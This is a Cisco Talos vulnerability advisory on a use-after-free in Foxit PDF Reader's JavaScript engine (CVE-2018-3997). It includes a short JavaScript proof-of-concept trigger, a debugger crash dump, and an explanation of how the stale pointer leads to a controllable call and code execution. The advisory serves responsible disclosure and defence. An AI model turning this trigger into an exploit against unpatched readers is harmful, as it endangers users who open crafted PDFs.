CVE-2018-3997: TALOS-2018-0665 || Cisco Talos Intelligence Group

Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 9.2.0.9297. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Tested Versions

Foxit Software Foxit PDF Reader 9.2.0.9297.

Product URLs

https://www.foxitsoftware.com/products/pdf-reader/

CVSSv3 Score

8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416: Use After Free

Details

Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.

When executing embedded JavaScript code, a document can be closed, which frees numerous used objects, but the JavaScript can continue to execute. A use-after-free condition can occur when accessing a variable that keeps a reference to a stale object.

This particular vulnerability lies in saving a reference to SeedValue object by invoking signatureGetSeedValue method of a form field. Objects are freed when the document is closed, and a use-after-free condition occurs when accessing the stale reference:

var tmp =  app.activeDocs[0].getField('mydata').signatureGetSeedValue();  // save reference
app.activeDocs[0].closeDoc();     // close document and free objects
var ret = tmp["legalAttestations"]; // reuse stale reference and cause use-after-free

Opening this proof-of-concept PDF document in Foxit Reader with pageheap enabled results in the following crash:

(244.1214): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FoxitReader.exe - 
eax=03d51598 ebx=08ef0a48 ecx=12d60fd0 edx=0bae2fd4 esi=11751fc0 edi=12e80da0
eip=01d57487 esp=0012e2f4 ebp=0012e304 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
FoxitReader!CryptUIWizExport+0x17a107:
01d57487 ff710c          push    dword ptr [ecx+0Ch]  ds:0023:12d60fdc=????????
0:000> dd ecx
12d60fd0  ???????? ???????? ???????? ????????
12d60fe0  ???????? ???????? ???????? ????????
12d60ff0  ???????? ???????? ???????? ????????
12d61000  ???????? ???????? ???????? ????????
12d61010  ???????? ???????? ???????? ????????
12d61020  ???????? ???????? ???????? ????????
12d61030  ???????? ???????? ???????? ????????
12d61040  ???????? ???????? ???????? ????????
0:000> k 5
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0012e304 01d5aa84 FoxitReader!CryptUIWizExport+0x17a107
01 0012e338 01d4cf3f FoxitReader!CryptUIWizExport+0x17d704
02 0012e390 02c9f2e2 FoxitReader!CryptUIWizExport+0x16fbbf
03 0012e3d0 02ceca87 FoxitReader!FXJSE_GetClass+0x302
04 0012e42c 02cff9df FoxitReader!CFXJSE_Arguments::GetValue+0x4d357
0:000> u
FoxitReader!CryptUIWizExport+0x17a107:
01d57487 ff710c          push    dword ptr [ecx+0Ch]
01d5748a 8bca            mov     ecx,edx
01d5748c 57              push    edi
01d5748d 8b402c          mov     eax,dword ptr [eax+2Ch]
01d57490 ffd0            call    eax

Analyzing the heap state clearly shows that ecx points into a freed memory region. And if we take a look at the code immediately following the point of crash, we can see ecx being used as a vtable pointer, ultimately leading to a call instruction with controllable operand in eax. This leads to a relatively straightforward condition for arbitrary code execution since the contents of the memory pointed to by ecx can be easily controlled.

Timeline

2018-09-10 - Vendor Disclosure
2018-09-28 - Vendor patched
2018-10-01 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.